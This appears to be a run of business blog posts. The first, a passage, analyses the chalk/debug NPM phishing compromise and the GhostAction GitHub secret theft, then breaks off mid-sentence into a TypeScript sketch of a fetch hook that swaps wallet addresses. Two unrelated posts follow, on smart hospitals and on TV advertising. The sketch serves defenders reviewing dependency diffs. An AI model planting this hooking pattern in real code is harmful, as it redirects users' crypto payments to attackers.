What the attackers did. The attackers went to the trouble of obfuscating the malicious code. In addition, the social engineering aspect of the incident was convincing. The email from “[email protected]” asked the developer to reset their two-factor authentication (2FA) credentials. The link in the email redirected to what appeared to be a legitimate NPM website. Unknowingly, the developer provided their legitimate credentials to the attacker-owned site and would not realize the compromise until they tried to log back in to their NPM account. Researchers at JFrog, a security company, noticed that other maintainers had also fallen victim to the same phishing campaign and that additional NPM packages were compromised, and they began notifying maintainers.

The impact. Overall, 2.5 million compromised package versions were downloaded. Researchers at Arkham, a blockchain analytics platform, were able to trace the crypto transactions in the attackers’ wallet, which, as of this past Thursday morning, held only $1,048.36. The window between the NPM account compromise, the maintainer realizing they were impacted, and the online reporting by cybersecurity research teams was short, which helped mitigate the overall attack. In addition, the attackers compromised multiple packages and maintainers, which was unlikely to go unnoticed. Also, thankfully, the malware required that a crypto transaction be initiated in the user’s browser, versus just collecting more information that could have been used to move laterally within an organization for a bigger payday.

GhostAction Campaign

In the “GhostAction” campaign, over 3,325 secrets were stolen across 817 GitHub repositories, affecting 327 users.

The software supply chain weakness. Attackers were able to push what appeared to be an innocuous commit, titled “Add GitHub Actions Security workflow,” to GitHub repositories both public and private. When the GitHub Action was triggered, secrets were exfiltrated to an attacker-controlled domain.

What the attackers did. Attackers did their homework. They reviewed repositories to see what secrets were in use and only exfiltrated the most impactful ones to stay under the radar. How attackers were able to access GitHub user accounts was not disclosed. Possibly, users fell prey to a social engineering campaign, as was the case in the chalk and debug campaign, or perhaps user credentials or tokens were stolen or leaked online. Another possible scenario is that a GitHub user account was not using 2FA and was reusing a password or subject to credential stuffing. This is unlikely, however, as GitHub enforces 2FA on GitHub.com for most contributing users.

The impact. A potpourri of secrets was exfiltrated, including Docker Hub credentials, GitHub personal access tokens, AWS access keys, NPM tokens, and database credentials. According to GitGuardian, which initially reported the attack, secrets were being actively exploited. The good news is that no open-source packages appear to have been compromised, but several NPM and PyPI projects were deemed at risk.

Take Action Now To Secure Your Software Supply Chain

These attacks prove that all software utilized by your organization, even software-as-a-service, is a security risk. Maintainers of popular open-source packages, compromised GitHub user accounts, and malicious code in open-source packages are just the latest examples of software supply chain weaknesses. Don’t wait for the next attack. Instead: Get visibility into your software supply chain. Before you can secure the software supply chain, you first need to have an understanding of what
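As referenced in the chalk and debug section above, here is a deliberately simplified, de-obfuscated sketch of the browser fetch-hooking pattern that class of malware uses. It illustrates the technique for defenders reviewing dependency diffs; it is not the actual payload, and the address pattern and placeholder are invented for illustration:

```typescript
// Simplified illustration of the hooking pattern (not the actual malware).
// The real payload was obfuscated and also hooked XMLHttpRequest and wallet APIs.
const realFetch = window.fetch;

window.fetch = async (
  input: RequestInfo | URL,
  init?: RequestInit
): Promise<Response> => {
  const response = await realFetch(input, init);
  const body = await response.clone().text();

  // Swap any wallet address in the response for an attacker-controlled one,
  // so the UI still "succeeds" while the funds are redirected.
  const tampered = body.replace(
    /\b0x[a-fA-F0-9]{40}\b/g, // pattern for an Ethereum-style address
    "0xATTACKER_CONTROLLED_ADDRESS" // placeholder, not a real address
  );

  return new Response(tampered, {
    status: response.status,
    headers: response.headers,
  });
};
```

Any dependency update that wraps window.fetch, XMLHttpRequest, or wallet-provider objects in a routine version bump deserves scrutiny; pinned versions and lockfile audits shrink the window in which a poisoned release can land.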


Guided By Empathy: How Smart Hospitals Innovate While Staying Patient-Centric

A hospital’s physical infrastructure is often outdated and incompatible with digital technologies, sustainability goals, and easy navigation. Many hospitals feel sterile, with bare walls and mazelike layouts, while hallways overflow with misplaced beds, IV poles, and diagnostic machines. It’s not unusual for patients and family members to get lost. Even basic processes such as food, laundry, and medicine delivery can slow operations and create confusion.

My Visit To A Smart Hospital

As a former practicing clinician, I’ve walked the halls of many hospitals — but none quite like Baden Cantonal Hospital (KSB) in Switzerland. During my recent visit, I saw firsthand how KSB is changing the narrative as it transforms into an intelligent healthcare organization (IHO). Built over a decade, the facility consolidated 13 floors of operations into three, creating a streamlined, digitally enabled environment that redefines what modern care delivery can look like. Here are some of the things that stood out to me:

- Healing architecture. With soothing colors, natural wood finishes, escalators in high-traffic areas, and natural light in almost every room, KSB’s design choices are intended to promote warmth and healing.
- Human-centric design. Patient units follow an open concept. There aren’t doors or separate corridors for different specialties, allowing staff to engage in cross-functional teamwork and communication. KSB installed bedside terminals that let patients charge devices, control lighting, and interact with care teams.
- Digital infrastructure. KSB integrated a centralized lab system. It uses automated vehicles for food delivery, has interactive navigation kiosks, and tracks equipment and optimizes room availability through 7,000 internet-of-things (IoT) sensors and 2,000 IoT tags using a Siemens asset tracking system. Notably, KSB created a digital twin of its building infrastructure, enabling predictive maintenance, patient flow simulation, resource optimization, and efficient management of building systems.

The challenge for hospitals that embrace this approach lies in making the facility truly functional through change management. Smart hospitals like KSB guide staff on how best to operate in a transformed environment and explain how their roles will evolve. At the same time, they remain human-centric, guided by common sense and empathy. Small details underscore the importance of integrating technology in ways that support comfort and healing: Even the blinking light of a sensor can disrupt patient sleep.

What Can US Health Systems Do Now To Transform?

As transformative facilities emerge from existing infrastructure, health system leaders need to be strategic when overhauling their digital ecosystems. Here are three transformation strategies that leaders can use while keeping empathy at the heart of innovative decision-making:

- Take a calculated leap of faith. Emerging technologies such as digital twins have enormous potential, especially as the technology matures. Plausible use cases with measurable ROI are more difficult to predict and capture, however. To fully realize the potential of emerging technologies, hospitals must prioritize strategic implementation and build the necessary infrastructure to support future adoption and optimization.
- Turn experiences into actionable clinical intelligence. When redesigning hospital environments, collect measurable data on patient and staff experiences from multiple perspectives, both before and after any changes. This clinical intelligence serves a dual purpose: It drives operational improvements while demonstrating empathy, enabling leaders to refine care delivery and the workplace experience.
- Define partner nonnegotiables. Healthcare leaders should establish clear priorities when choosing vendor partners — e.g., focusing on healing architecture, digital infrastructure, or sustainability. The best partners will codesign solutions, share long-term goals, and help create care environments and improve workflows that support innovation, clinical excellence, and human connection.

To dig deeper and prepare for your organization’s transformation to an IHO, check out our latest report, Purposeful Tech Partnerships Unlock Healthcare Transformation. It applies the Forrester Intelligent Healthcare Organization Framework to inform technology choices and evolve partnership ecosystems. Please schedule a guidance session to learn more.


Rewind And Fast-Forward TV Advertising

TV’s stakeholders — consumers, advertisers, and publishers — are out of sync. Consumers love streaming TV but say they don’t want streaming TV ads because of their frequency and irrelevance. Advertisers adopt genAI to try to make ads more compelling, but according to one member of Forrester’s Market Research Online Community, “when brands use generative AI in TV commercials, they lose their authenticity.” Consumers want to stream live sports, so publishers such as Disney and Netflix lure live sports fans to streaming TV, which seems like a win-win but complicates viewing. For example, in the NFL’s first week, consumers toggled between as many as eight streaming services to watch all 16 games. Next summer, the World Cup will spread across four streaming providers, adding friction to consumers’ fandom while duplicating advertisers’ reach. One of advertisers’ greatest challenges with TV advertising is “streaming TV’s high CPMs,” according to Forrester’s Q2 2025 CMO Pulse Survey. TV advertising’s sellers benefit at TV buyers’ expense, and consumers are caught in the middle.

Transcend TV’s Past And Potential To Maximize Its Impact

Once an offline, live, consolidated medium, TV is now internet-connected, on demand, and convoluted. While TV’s digital transformation makes the medium more addressable, programmatic, and measurable, it also upends TV’s role in the funnel, in media plans, and in advertising’s supply chain. Across TV planning, buying, and optimization workflows, advertisers need a strategy that blends the best of TV’s past and present. For instance, gross rating points, which correlate with brand energy but distance TV from the bottom of the funnel, can be phased out in favor of new KPIs that measure TV’s full-funnel efficacy. Other elements of TV’s past, like index-based buying and cost-effective reach, remain useful. To make TV advertising’s past and future more than the sum of their parts, marketers should:

- Minimize the TV supply chain’s time to value. A complex supply chain, including publisher ad servers, supply-side platforms, automatic content recognition vendors, demand-side platforms, advertiser ad servers, and more, needlessly complicates TV advertising. Avoid this by getting as close as possible to TV viewers. Transact directly with publishers using technologies like Warner Bros. Discovery’s NEO, which launched at this year’s upfronts. Other publishers are following suit, offering buyers direct access to premium video inventory across streaming and linear TV.
- Clarify TV’s short- and long-term impacts. Continue using unaided awareness surveys to measure TV’s long-term impact on new-to-brand sales, as brands have done for decades. Pair them with proof of TV’s immediate impact on the middle of the funnel. In partnership with TV measurement providers, learn how TV ad exposures cause consumers who would have searched for generic terms to search for branded terms instead. This makes TV plus search a more profitable way to compete for traffic. Overall, optimize for metrics such as blended ROAS and marketing expense ratio, which capture TV’s near- and long-term value (see the sketch below).

To learn more, Forrester clients can check out our latest report on TV advertising and schedule a guidance session to game-plan total TV. Always feel free to contact us with questions and feedback.
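As a quick illustration of those two KPIs (all numbers hypothetical), the arithmetic looks like this:

```typescript
// Hypothetical figures for illustration only.
const tvSpend = 2_000_000;
const searchSpend = 500_000;
const revenueAttributed = 7_500_000; // revenue tied to TV + search, near- and long-term
const totalRevenue = 40_000_000;
const totalMarketingSpend = 6_000_000;

// Blended ROAS: revenue per dollar across the combined channels.
const blendedRoas = revenueAttributed / (tvSpend + searchSpend); // = 3.0

// Marketing expense ratio: total marketing spend as a share of total revenue.
const marketingExpenseRatio = totalMarketingSpend / totalRevenue; // = 0.15

console.log({ blendedRoas, marketingExpenseRatio });
```

Because the denominator pools TV and search spend, TV’s assist to branded search is credited to the blend rather than lost to last-click attribution.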
